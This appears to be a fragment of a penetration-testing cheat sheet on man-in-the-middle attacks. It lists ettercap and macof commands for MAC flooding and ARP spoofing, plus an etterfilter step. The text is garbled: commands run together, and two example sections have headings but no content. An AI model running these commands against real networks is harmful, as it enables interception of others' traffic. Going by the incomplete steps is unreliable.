Man in the Middle Attack (MitM)
Tools: Ettercap, macof, ip, nmap, ping, Burpsuite
Requirements: Root the machine that has access to more machines on its network, then scan with a port scanner (nmap)
MAC FLODDING
ettercap -T -i INTERFACE -P rand_flood -q -w /tmp/tcpdump3.pcapmacof -i INTERFACEARP SPOOFING
ettercap -T -i INTERFACE_2 -M arpMAN IN THE MIDDLE MANIPULATION
etterfilter example.ecf -o example.efMITM EXAMPLE 2
TIP: Attacker and target should be connected in the same network for this to work
MITM EXAMPLE 3
Requirements: Webapp uses self-signed certificate instead form a trusted CA
Steps:
Last updated